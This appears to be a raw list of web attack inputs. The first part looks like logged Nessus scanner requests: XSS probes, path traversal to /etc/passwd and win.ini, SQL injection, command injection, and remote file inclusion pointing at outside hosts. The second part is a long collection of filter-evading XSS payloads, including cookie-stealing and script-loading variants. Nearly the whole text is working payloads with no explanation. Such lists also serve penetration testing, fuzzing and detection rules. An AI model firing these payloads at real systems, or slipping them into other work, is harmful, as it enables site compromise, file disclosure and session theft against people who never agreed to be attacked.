src=\"javascript:alert(cross_site_scripting.nasl);\">\n/8x6w469u.htm?<script>document.cookie=\"testgfjr=1286;\"</script>\n/cacti/workarea/contentdesigner/ekformsiframe.aspx?id=\"><script>alert('nessus')</script>\n/javascript/catalog.exe\n/scripts/comersus_backoffice_login.php\n/index.php?src=1&_common=1&time=1331908884&action=show_view&module=calendarmodule&view=../../../../../../../../../../etc/passwd\\x00\n/help.php?q='&sleep 11 #\n/e9rx3ya4.asp?<script>cross_site_scripting.nasl</script>\n/manager/c32web.exe/getimage?imagename=cart32.ini\\x00.gif\n/main.php?logout=\"&rm;q32916572&rem;\n/put/cgi-bin/putport.exe?swap&bom&op=none&lang=en-us&puthtml=../../../../../../../../etc/passwd\n/cookie/?name=nessus&value=<script>alert('jetty_cookie_xss.nasl')</script>&age=564\n/en-us/ddoworrl.html?<meta http-equiv=set-cookie content=\"testvlau=8517\">\n/h21y8w52.cfc?<script>cross_site_scripting.nasl</script>\n/accesso_script/\n/viagra-prescription/\n/d44uk9h2.html?<script>document.cookie=\"testmybc=2088;\"</script>\n/?<meta http-equiv=set-cookie content=\"testmjct=1867\">\n/javascript/ingress.exe\n/mostlyce/jscripts/tiny_mce/plugins/htmltemplate/htmltemplate.php?mosconfig_absolute_path=http://192.168.202.118:8080/moclyxlwqyfjnp?\n/en-us/account/hsx.cgi?show=../../../../../../../../../../../../../etc/passwd\\x00\n/javascript/doc.exe\n/cgi-bin/c32web.exe/getimage?imagename=cart32.ini\\x00.gif\n/scripts/includes/main.conf\n/examples/jsp/colors/dcforum.cgi?az=list&forum=../../../../../../../etc/passwd\\x00\n/modules.php?name=search&file=../../../../../../../../../../../boot.ini\\x00\n/examples/jsp/cal/resetpw.php?email=../../../../../../../../../../../../etc/passwd\n/en-us/33y9gcqq.php3?<meta http-equiv=set-cookie content=\"testnvxc=4301\">\n/javascript/.passwd.zip\n/search.jsp?q=%\"<script>alert(1331908793)</script>\n/6n7aacgg.asp?<script>cross_site_scripting.nasl</script>\n/examples/jsp/checkbox/adlayer.php?layerstyle=../../../../../../../etc/passwd\\x00\n/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331904365&lang_crm=../../vtigerservice.php\\x00\n/jeux_d'argent/\n/help.php?q=\"ping,-w,9000,-n,1,1.2.3.4&rem,\n/top.php?stuff=\"&ping\\x09-w\\x097000\\x09-n\\x091\\x091.2.3.4&rem\\x09\n/cgi-bin/tinybrowser/upload.php?badfiles=1><script>alert('tinybrowser_multiple_xss.nasl')</script>\n/5o9zq43e.exe?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/help.php?q=ver,>q87514478&rem,\n/examples/servlets/servlet/index.php?id=urjhxcl19w'\n/eg2u8pbv.exe?<script>cross_site_scripting.nasl</script>\n/scripts/help/en_us/content/master/webadmin/webadmin.html\n/tukodz3j.dll?<script>cross_site_scripting.nasl</script>\n/scripts/1331908678-ror_session_fixation.nasl\n/include/scripts/run_auto_suspend.cron.php?dir=http://192.168.202.96:8080/4dckqcc0acprbz?\n/zln2hm2z.php?<meta http-equiv=set-cookie content=\"testblcp=8120\">\n/aj3pf49c.cfc?<script>document.cookie=\"testnofv=4170;\"</script>\n/recordings/notify?from=nessus\"|id\"\n/en-us/9kr0ih0v.html?<meta http-equiv=set-cookie content=\"testzgnm=1183\">\n/someunexistantantsutff.exe\n/b4vng02k.cgi?<script>document.cookie=\"testtrlh=3672;\"</script>\n/javascript/billing.exe\n/cgi-bin/evb/check_url.php?url=pligg_url_sql_injection.nasl' union select 1331904454,472430861 -- \n/u95h6ymu.htm?<meta http-equiv=set-cookie content=\"testkhwc=4028\">\n/scripts/viewcart.asp?userid='\n/scripts/vhost.php?action=logout&time=1332010201\n/scs86g1p.kspx?<script>document.cookie=\"testquyx=2820;\"</script>\n/scripts/index.php?option=weblinks&itemid=2&catid=-1 union select 0,1,2,709400366843,4,5,6,7,8,9,10,11--\n/ybz5rz7a.fts?<meta http-equiv=set-cookie content=\"testsbvw=6289\">\n/cacti/feedsplitter.php?format=../../../../../../../../../../etc/passwd\\x00&debug=1\n/h5i6crm3.fts?<script>document.cookie=\"testlihk=7070;\"</script>\n/help.php?q=\";rm q25549328 #\n/ygkjkngd.php3?<script>document.cookie=\"testnago=4518;\"</script>\n/cgi-exe/c32web.exe/getimage?imagename=customeremail.txt\\x00.pdf\n/main.php?stuff='\\x0arm q61656815 #\n/i686v90l.dll?<script>document.cookie=\"testfutf=1550;\"</script>\n/scripts/app_and_readme/navigator/index.php?page=http://cirt.net/rfiinc.txt?\n/examples/jsp/sessions/perl.exe?-v\n/help.php?q=\"\\x0asleep 10 #\n/top.php?stuff=\";del q35544877 #\n/pls/dadname/htp.print?cbuf=<script>alert('vulnerable')</script>\n/j2kdmfw4.aspx?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/cgi-bin/openview5.exe?target=main&action=../../../../../../../../../..//winnt/win.ini\n/j734qobz.x?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/checkbox/evb/check_url.php?url=pligg_url_sql_injection.nasl' union select 1331904454,472430861 -- \n/nyjgaorz.kspx?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/scripts/bpk_bsfe_4vq.asp\n/zoomstats/libs/dbmax/mysql.php?globals['lib']['db']['path']=@rfiurl?globals['lib']['db']['path']=@rfiurl?\n/en-us/account/admin/addentry.php?phpbb_root_path=/etc/passwd\\x00\n/newslettersubscriptions/\n/l4fz1dqw.aspx?<script>cross_site_scripting.nasl</script>\n/d5a5renl.cfm?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/scripts/index.php?id=k7u62jp49d'\n/main.php?frm_daynight=day&frm_passwd=q71286611&frm_referer=http%3a//192.168.26.202/main.php%3fstuff%3d1861731255&frm_user=&scr_height=&scr_width=\n/cgiscriptor-2/\n/de3v2dd9.htm?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/recordings/commerce.cgi?page=../../../../../etc/passwd\\x00index.html\n/examples/jsp/cal/index.php?mod_id=2&kb_ask=</textarea><script>alert(\"cerberus_support_center_mult_flaws.nasl\")</script>\n/cgi-bin/msmmask.exe?mask=/nessus1707503901.asp\n/javascript/xyzzy.exe\n/examples/jsp/error/home?dir=/&file=../../../../../../../../../../../../etc/passwd&lang=kor\n/9kr0ih0v.php3?<meta http-equiv=set-cookie content=\"testzgnm=1183\">\n/?<script>document.cookie=\"testhvje=9403;\"</script>\n/n9xlumt5.jspa?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/scripts/livre_include.php?no_connect=lol&chem_absolu=http://xxxxxx./\n/t578vqea.cfm?<script>document.cookie=\"testsory=7676;\"</script>\n/examples/jsp/cal/search.cgi?..\\..\\..\\..\\..\\..\\windows\\win.ini\n/cgi-bin/web_store/web_store.cgi?page=../../../../../../etc/passwd\\x00.html\n/spamproof-noscript/\n/uc3w3bdi.cfc?<meta http-equiv=set-cookie content=\"testxllt=9940\">\n/main.php?frm_daynight=day&frm_passwd=&frm_referer=http%3a//192.168.24.202/&frm_user=q75544552&scr_height=&scr_width=\n/ao22ww7y.kspx?<meta http-equiv=set-cookie content=\"testqppc=8767\">\n/8x6w469u.nsf?<script>document.cookie=\"testgfjr=1286;\"</script>\n/help.php?q=\"rm;q28828634&rem;\n/scripts/lrn28issfuqi.cgi\n/recordings/quickstore.cgi?page=../../../../../../../../../../etc/passwd\\x00html&cart_id=\n/edv3mapy.cgi?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/en-us/n9xlumt5.html?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/scripts/ui/login?user=nessus-1331923136\n/examples/jsp/jsp2/el/styles.php?toroot=/etc/passwd\\x00\n/scripts/index.php?option=weblinks&itemid=2&catid=-1 union select 0,1,2,179101196039,4,5,6,7,8,9,10,11--\n/en-us/w4996nr0.fts?<script>document.cookie=\"testttvs=7163;\"</script>\n/?<script>document.cookie=\"testiulz=3709;\"</script>\n/help.php?q=\\x0auname\\x09>q86474454\\x09#\n/help.php?q=\"&ping\\x09-w\\x0911000\\x09-n\\x091\\x094.3.2.1&rem\\x09\n/phpmyadmin//%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2eetc/passwd\n/cgi-bin/search.jsp?q=%\"<script>alert(1331922005)</script>\n/scripts/query.cgi\n/examples/jsp/cal/evb/check_url.php?url=pligg_url_sql_injection.nasl' union select 1331904454,472430861 -- \n/jnt3f86c.cgi?<meta http-equiv=set-cookie content=\"testcmax=9270\">\n/scripts/bb-hostsvc.sh?hostsvc=../../../../../etc/passwd\n/javascript/log.exe\n/phpmyadmin/news/index.dot?id=../../../../../../../../../../../..//etc/passwd\\x00.jpg\n/help.php?q=\"ver\\x0c>q43711515&rem\\x0c\n/scripts/zml.cgi?file=../../../../../../../../../../../../etc/passwd\\x00\n/bxnyrhmh.html?<script>document.cookie=\"testmjct=1867;\"</script>\n/top.php?stuff=ver;>q44566983&rem;\n/main.php?logout=\"|ping\\x09-w\\x098000\\x09-n\\x091\\x091.2.3.4|rem\\x09\n/0z575z74.jspa?<meta http-equiv=set-cookie content=\"testuhsv=9753\">\n/examples/jsp/checkbox/admin/file_manager.php?action=read&filename=../../../../../../../../etc/passwd\n/top.php?stuff=ping;-w;9000;-n;1;1.2.3.4|rem;\n/help.php?q=';uname >q14794373 #\n/main.php?stuff=\"&ver,>q93432438&rem,\n/subscription-homepage/\n/help.php?q=';del q19585815 #\n/zqqemp6j.html?<script>cross_site_scripting.nasl</script>\n/byrg33fw.mscgi?<script>document.cookie=\"testexuu=5340;\"</script>\n/ifx/?lo=../../../../../etc/passwd\n/help.php?q=\"ver\\x0b>q87717318&rem\\x0b\n/help.php?q=\"uname #\n/examples/jsp/sessions/item.fts?href=\"><script>alert(\"ftgate_44002.nasl\")</script>;\n/javascript/htpasswd.jar\n/examples/jsp/cal/bb_func_txt.php?pathtofiles=/etc/passwd\\x00\n<script>document.cookie=\"testkhwc=4028;\"</script>\n/manager/lib/dbman_filter.inc.php?lib_path=/etc/passwd\\x00\n/manager/phptonuke.php?filnavn=/etc/passwd\n/top.php?stuff=ver,>q48924166&rem,\n/en-us/n9xlumt5.do?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/3j8echh0.mscgi?<script>document.cookie=\"testfuqi=4189;\"</script>\n/scripts/data/usr\n/copatranscript_20061026/\n/rbec2ohx.cfm?<script>cross_site_scripting.nasl</script>\n/top.php?stuff=\"ver\\xa0>q42369787&rem\\xa0\n/main.php?logout=;del\\x09q84429989\\x09#\n/javascript/formatting.exe\n/javascript/type.exe\n/h21y8w52.jsp?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/j4drbkil.do?<script>cross_site_scripting.nasl</script>\n/main.php?logout=\";uname\\x09>q14876269\\x09#\n/top.php?stuff='|sleep 7 #\n/\"development+tools\"/\n/zabbix/frontends/php/locales.php?download=1&langto=1&extlang[\".system('/./tmp/pxvobegahd0+>+/dev/null+&').\"]=1\n/examples/jsp/cal/search/results.stm?indexname=>\"><script>foo</script>&style=fancy&spage=60&query=folder name\n/scriptpage/source/includes/load_forum.php?mfh_root_path=http://cirt.net/rfiinc.txt?\n/examples/servlets/servlet/bb-hist.sh?histfile=../../../../../etc/passwd\n/<script>document.cookie=\"testiulz=3709;\"</script>\n/examples/jsp/num/bigconf.cgi?command=view_textfile&file=/etc/passwd&filters=;\n/examples/servlets/servlet/crystalimagehandler.aspx?dynamicimage=../../../../../../../../winnt/system.ini\n/examples/servlets/servlet/cgiip.exe/wservice=wsbroker1/webtools/oscommand.w\n/ht8pn8uq.php3?<script>cross_site_scripting.nasl</script>\n/scriptforge/\n/phpmyadmin/index.pl/homels?func=add;class=webgui::asset::wobject::article;print `id`;\n/bn857frh.nsf?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/weq93ppb.asp?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/en-us/<script>cross_site_scripting.nasl</script>.kspx\n/main.php?stuff=\"\\x0duname >q12524199 #\n/help.php?q=&ver;>q75765892&rem;\n/admin/index.php?path_to_script=http://192.168.202.96:8080/frznctvhi0i5??&cmd=ls\n/82q7ywa8.html?<script>document.cookie=\"testpwew=1315;\"</script>\n/m5103snj.asp?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/?<meta http-equiv=set-cookie content=\"testrhbc=8184\">\n/cgi-bin/..\\xc0%qf..\\xc0%qf..\\xc0%qf..\\xc0%qf..\\xc0%qf../winnt/system32/cmd.exe?/c+dir+c:\\+/og\n/examples/jsp/colors/sources/functions.php?root_path=/etc/passwd\\x00\n/gangsta' bang/\n/admin/news.admin.php?path_to_script=http://192.168.202.96:8080/ipb5ri??&cmd=ls\n/top.php?stuff='del q36497765 #\n/qhvu0pdg.kspx?<meta http-equiv=set-cookie content=\"testchuc=2100\">\n/manager/adodb/server.php?sql='adodb_sql_sql_injection.nasl\n/en-us/fo564rei.cfc?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/ybz5rz7a.asp?<meta http-equiv=set-cookie content=\"testsbvw=6289\">\n/examples/jsp/jsp2/el/index.php?gadget=glossary&action=viewterm&term=<script>alert('jaws_xss.nasl');</script>\n/h21y8w52.cgi?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\nftp://192.168.22.102/*<apache_mod_proxy_ftp_glob_xss.nasl>\n/t7tm4m0b.jsp?<script>cross_site_scripting.nasl</script>\n/m2fpztty.nsf?<script>cross_site_scripting.nasl</script>\n/scripts/neomail-prefs.pl?sessionid=nessus-session-0.neomail_sessionid_validation.nasl&action=addfolder&foldername=t_nebyijvisxgmwm5\n/scripts/event_view.php?eid=34 union select 1948700004\n/6qbynt4f.cgi?<script>cross_site_scripting.nasl</script>\n/lcgi/sewse.nlm?sys:/novonyx/suitespot/docs/sewse/viewcode.jse+httplist+httplist/../../../../../system/autoexec.ncf\n/examples/jsp/checkbox/index.php?post=../config/password\n/bmeun223.aspx?<meta http-equiv=set-cookie content=\"testhhwu=7044\">\n/cgi-perl/webcart/webcart.cgi?change=yes&code=phold&config=mountain&nextpage=;cat /etc/passwd|\n/help.php?q=\"&del,q81149724&rem,\n/cgi-bin/config.php?returnpath=/etc/passwd\\x00\n/main.php?stuff=\";del q31473843 #\n/help.php?q=\"rm q11698793 #\n/top.php?stuff=\"ping\\xa0-w\\xa011000\\xa0-n\\xa01\\xa01.2.3.4|rem\\xa0\n/vjbrrppi.jsp?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/<meta http-equiv=set-cookie content=\"testiabz=5220\">\n/examples/servlets/servlet/mapserv.exe?map=mapserver_detect.nasl.map\n/help.php?q=\"&ping\\x0b-w\\x0b11000\\x0b-n\\x0b1\\x0b1.2.3.4&rem\\x0b\n/javascript/uploads.exe\n/?<meta http-equiv=set-cookie content=\"testttvs=7163\">\n/main.php?logout=\"rm,q74451345&rem,\n/top.php?stuff=ver\\xa0>q97591898&rem\\xa0\n/help.php?q=ver;>q81588837&rem;\n/6wb70v0b.kspx?<script>cross_site_scripting.nasl</script>\n/en-us/account/forum_2.php?msg=10&return=<script>foo</script>\n/examples/jsp/jsp2/jspx/index.php?templates_dir=/etc/passwd\\x00\n/<img src=\"javascript:alert(cross_site_scripting.nasl);\">.idc\n/scripts/wordtrans.php?command=show_desc&advanced=1\";id; true \"\n/examples/jsp/colors/index.php?page=documents&doc=-99' union select null,null,'nessus','dcpportal_sql.nasl',null,null,null,null,null,null,null,null--\n/javascript/htpasswd.do\n/newsubscription/\n/fmnveedu.asp?<script>document.cookie=\"testgfbr=7014;\"</script>\n/rv98iwjp.pl?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/help.php?q='rm\\x09q77922174\\x09#\n/javascript/serv.exe\n/top.php?stuff=\"|ping\\x0c-w\\x0c9000\\x0c-n\\x0c1\\x0c1.2.3.4|rem\\x0c\n/scripts/callboth.php?seq=654321&out=123456&in=1332008332@nessus\\x0d\\x0aasteridex_in_code_injection.nasl\n/help.php?q=\"ping\\x0c-w\\x0c7000\\x0c-n\\x0c1\\x0c4.3.2.1|rem\\x0c\n/cgi-bin/www/delivery/ac.php?bannerid=-1331919146+or+1=1+--+';passthru(base64_decode($_server[http_nessus_nwqzfywo]));die;/*\n/en-us/account/index.php?show=/etc/passwd\n/bmeun223.php3?<script>document.cookie=\"testhhwu=7044;\"</script>\n/?<script>document.cookie=\"testjnre=7328;\"</script>\n/subscriptionbutton/\n/scripts/listing.php\n/examples/jsp/jsp2/el/cgiwrap/cgiwrap_error_page_handling_xss.nasl\n/en-us/odzk29aa.dll?<meta http-equiv=set-cookie content=\"testtfvh=2141\">\n/b1q8bywu.pl?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/m4kkjf8l.mscgi?<meta http-equiv=set-cookie content=\"testyglc=8988\">\n/q703m78q.aspx?<script>document.cookie=\"testvowq=604;\"</script>\n/javascript/wc.exe\n/main.php?stuff=\"ver&rem\\x0b\n/nyvbv05h.cfc?<meta http-equiv=set-cookie content=\"testftxz=5980\">\n/examples/jsp/checkbox/hw3.cgi?daysonly=0).system('id').(\n/script/common.inc.php?path_inc=http://192.168.202.96:8080/4dckqcc0acprbz?\n/javascript/cookies.exe\n/scripts/admin/file_manager.php?action=read&filename=../../../../../../../../etc/passwd\n/help.php?q=\"&ping\\x09-w\\x0910000\\x09-n\\x091\\x094.3.2.1&rem\\x09\n/help.php?q=;uname >q13157688 #\n'\n <font style='color:expression(alert('XSS'))'>\n' onmouseover=alert(/Black.Spook/)\n' or 2=2\n\"\n\" or 202\n\";eval(unescape(location))//#  %0Aalert(0)\n\"><BODY onload!#$%&()*~+-_.,:;?@[/|\\]^`=alert(\"XSS\")>\n\"><iframe%20src=\"http://google.com\"%%203E\n\"><img src=x onerror=prompt(1);>\n\"><img src=x onerror=window.open('https://www.google.com/');>\n'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Eshadowlabs(0x000045)%3C/script%3E\n%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3ERWAR%280x00010E%29%3C%2Fscript%3E\n%3Cscript%3Exhr=new%20ActiveXObject%28%22Msxml2.XMLHTTP%22%29;xhr.open%28%22GET%22,%22/xssme2%22,true%29;xhr.onreadystatechange=function%28%29{if%28xhr.readyState==4%26%26xhr.status==200%29{alert%28xhr.responseText.match%28/%27%28[^%27]%2b%29/%29[1]%29}};xhr.send%28%29;%3C/script%3E\n&#x61;l&#x65;rt&#40;1)\n&<script&S1&TS&1>alert&A7&(1)&R&UA;&&<&A9&11/script&X&>\n&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi\n&amp;#39;&amp;#88;&amp;#83;&amp;#83;&amp;#39;&amp;#41;&gt;\n&lt;IMG \"\"\"><SCRIPT>alert(\"XSS\")</SCRIPT>\">\n&lt;img src&equals;x:x onerror&equals;alert&lpar;1&rpar;&gt;\n&lt;IMG SRC=&amp;#106;&amp;#97;&amp;#118;&amp;#97;&amp;#115;&amp;#99;&amp;#114;&amp;#105;&amp;#112;&amp;#116;&amp;#58;&amp;#97;&amp;#108;&amp;#101;&amp;#114;&amp;#116;&amp;#40;\n&lt;SCRIPT SRC=//xss.rocks/.j>\n'); alert('XSS\n\\\";alert('XSS');//\n<%<!--'%><script>alert(1);</script -->\n<%73%63%72%69%70%74> %64 = %64%6f%63%75%6d%65%6e%74%2e%63%72%65%61%74%65%45%6c%65%6d%65%6e%74(%22%64%69%76%22); %64%2e%61%70%70%65%6e%64%43%68%69%6c%64(%64%6f%63%75%6d%65%6e%74%2e%68%65%61%64%2e%63%6c%6f%6e%65%4e%6f%64%65(%74%72%75%65)); %61%6c%65%72%74(%64%2e%69%6e%6e%65%72%48%54%4d%4c%2e%6d%61%74%63%68(%22%63%6f%6f%6b%69%65 = '(%2e%2a%3f)'%22)[%31]); </%73%63%72%69%70%74>\n<--`<img/src=` onerror=alert(1)> --!>\n<~/XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>\n<<scr\\0ipt/src=http://xss.com/xss.js></script\n<<SCRIPT>alert(\"XSS\");//<</SCRIPT>\n<a  href=\"data:text/html;blabla,&#60&#115&#99&#114&#105&#112&#116&#32&#115&#114&#99&#61&#34&#104&#116&#116&#112&#58&#47&#47&#115&#116&#101&#114&#110&#101&#102&#97&#109&#105&#108&#121&#46&#110&#101&#116&#47&#102&#111&#111&#46&#106&#115&#34&#62&#60&#47&#115&#99&#114&#105&#112&#116&#62&#8203\">Click  Me</a>\n<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa  aaaaaaaaa aaaaaaaaaa  href=j&#97v&#97script&#x3A;&#97lert(1)>ClickMe\n<a href=\"data:text/html;base64_,<svg/onload=\\u0061&#x6C;&#101%72t(1)>\">X</a\n<a href=\"javascript&colon;\\u0061&#x6C;&#101%72t&lpar;1&rpar;\"><button>\n<a href=\"jAvAsCrIpT&colon;alert&lpar;1&rpar;\">X</a>\n<a href=javascript&colon;alert&lpar;document&period;cookie&rpar;>Click Here</a>\n<a onmouseover=\"alert(document.cookie)\">xxs link</a>\n<a onmouseover=alert(document.cookie)>xxs link</a>\n<a target=\"x\" href=\"xssme?xss=%3Cscript%3EaddEventListener%28%22DOMFrameContentLoaded%22,%20function%28e%29%20{e.stopPropagation%28%29;},%20true%29;%3C/script%3E%3Ciframe%20src=%22data:text/html,%253cscript%253eObject.defineProperty%28top,%20%27MyEvent%27,%20{value:%20Object,%20configurable:%20true}%29;function%20y%28%29%20{alert%28top.Safe.get%28%29%29;};event%20=%20new%20Object%28%29;event.type%20=%20%27click%27;event.isTrusted%20=%20true;y%28event%29;%253c/script%253e%22%3E%3C/iframe%3E\n<a target=\"x\" href=\"xssme?xss=<script>find('cookie'); var doc = getSelection().getRangeAt(0).startContainer.ownerDocument; console.log(doc); var xpe = new XPathEvaluator(); var nsResolver = xpe.createNSResolver(doc); var result = xpe.evaluate('//script/text()', doc, nsResolver, 0, null); alert(result.iterateNext().data.match(/cookie = '(.*?)'/)[1])</script>\n<a target=\"x\" href=\"xssme?xss=<script>function x(window) { eval(location.hash.substr(1)) }</script><iframe src=%22javascript:parent.x(window);%22></iframe>#var xhr = new window.XMLHttpRequest();xhr.open('GET', '.', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();\n<a target=\"x\" href=\"xssme?xss=<script>var cl=Components;var fcc=String.fromCharCode;doc=cl.lookupMethod(top, fcc(100,111,99,117,109,101,110,116) )( );cl.lookupMethod(doc,fcc(119,114,105,116,101))(doc.location.hash)</script>#<iframe src=data:text/html;base64,PHNjcmlwdD5ldmFsKGF0b2IobmFtZSkpPC9zY3JpcHQ%2b name=ZG9jPUNvbXBvbmVudHMubG9va3VwTWV0aG9kKHRvcC50b3AsJ2RvY3VtZW50JykoKTt2YXIgZmlyZU9uVGhpcyA9ICBkb2MuZ2V0RWxlbWVudEJ5SWQoJ3NhZmUxMjMnKTt2YXIgZXZPYmogPSBkb2N1bWVudC5jcmVhdGVFdmVudCgnTW91c2VFdmVudHMnKTtldk9iai5pbml0TW91c2VFdmVudCggJ2NsaWNrJywgdHJ1ZSwgdHJ1ZSwgd2luZG93LCAxLCAxMiwgMzQ1LCA3LCAyMjAsIGZhbHNlLCBmYWxzZSwgdHJ1ZSwgZmFsc2UsIDAsIG51bGwgKTtldk9iai5fX2RlZmluZUdldHRlcl9fKCdpc1RydXN0ZWQnLGZ1bmN0aW9uKCl7cmV0dXJuIHRydWV9KTtmdW5jdGlvbiB4eChjKXtyZXR1cm4gdG9wLlNhZmUuZ2V0KCl9O2FsZXJ0KHh4KGV2T2JqKSk></iframe>\n<BASE HREF=\"javascript:alert('XSS');//\">\n<BODY onload!#$%&()*~+-_.,:;?@[/|\\]^`=alert(\"XSS\")>\n<body onLoad=\"alert('XSS');\"\n<body onunload=\"javascript:alert('XSS');\">\n<body/onload=&lt;!--&gt;&#10alert(1)>\n<div  style=\"position:absolute;top:0;left:0;width:100%;height:100%\"  onmouseover=\"prompt(1)\" onclick=\"alert(1)\">x</button>?\n<div onmouseover='alert&lpar;1&rpar;'>DIV</div>\n<div/onmouseover='alert(1)'> style=\"x:\">\n<embed code=\"http://businessinfo.co.uk/labs/xss/xss.swf\" allowscriptaccess=always>?\n<embed src=\"http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf\"> ?\n<form><button formaction=javascript&colon;alert(1)>CLICKME\n<FRAMESET><FRAME SRC=\\\"javascript:alert('XSS');\\\"></FRAMESET>\n<iframe  src=\"data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E\"></iframe>\n<iframe  src=j&NewLine;&Tab;a&NewLine;&Tab;&Tab;v&NewLine;&Tab;&Tab;&Tab;a&NewLine;&Tab;&Tab;&Tab;&Tab;s&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;c&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;i&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;p&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&colon;a&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;l&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;e&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%28&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;1&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%29></iframe> ?\n<iframe  src=j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t&Tab;:a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;%28&Tab;1&Tab;%29></iframe>\n<iframe id=%22ifra%22 src=%22/%22></iframe> <script>ifr = document.getElementById('ifra'); ifr.contentDocument.write(%22<scr%22 %2b %22ipt>top.foo = Object.defineProperty</scr%22 %2b %22ipt>%22); foo(window, 'Safe', {value:{}}); foo(Safe, 'get', {value:function() {    return document.cookie }}); alert(Safe.get());</script>\n<iframe onload=%22write('<script>'%2Blocation.hash.substr(1)%2B'</script>')%22></iframe>#var xhr = new XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();\n<iframe src=%22404%22 onload=%22content.frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\\/script>%26quot;)%22></iframe>\n<iframe src=%22404%22 onload=%22frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\\/script>%26quot;)%22></iframe>\n<iframe src=%22404%22 onload=%22self.frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\\/script>%26quot;)%22></iframe>\n<iframe src=%22404%22 onload=%22top.frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\\/script>%26quot;)%22></iframe>\n<iframe src=/ onload=eval(unescape(this.name.replace(/\\/g,null))) name=fff%253Dnew%2520this.contentWindow.window.XMLHttpRequest%2528%2529%253Bfff.open%2528%2522GET%2522%252C%2522xssme2%2522%2529%253Bfff.onreadystatechange%253Dfunction%2528%2529%257Bif%2520%2528fff.readyState%253D%253D4%2520%2526%2526%2520fff.status%253D%253D200%2529%257Balert%2528fff.responseText%2529%253B%257D%257D%253Bfff.send%2528%2529%253B></iframe>\n<iframe src=`http://xssme.html5sec.org/?xss=<iframe onload=%22xhr=new XMLHttpRequest();xhr.open('GET','http://html5sec.org/xssme2',true);xhr.onreadystatechange=function(){if(xhr.readyState==4%26%26xhr.status==200){alert(xhr.responseText.match(/'([^']%2b)/)[1])}};xhr.send();%22>`>\n<iframe src=http://xss.rocks/scriptlet.html <\n<iframe style=\"position:absolute;top:0;left:0;width:100%;height:100%\" onmouseover=\"prompt(1)\">\n<iframe/onreadystatechange=\\u0061\\u006C\\u0065\\u0072\\u0074('\\u0061') worksinIE>\n<iframe/onreadystatechange=alert(1)\n<iframe/src \\/\\/onload = prompt(1)\n<IMG DYNSRC=\\\"javascript:alert('XSS')\\\">\n<IMG 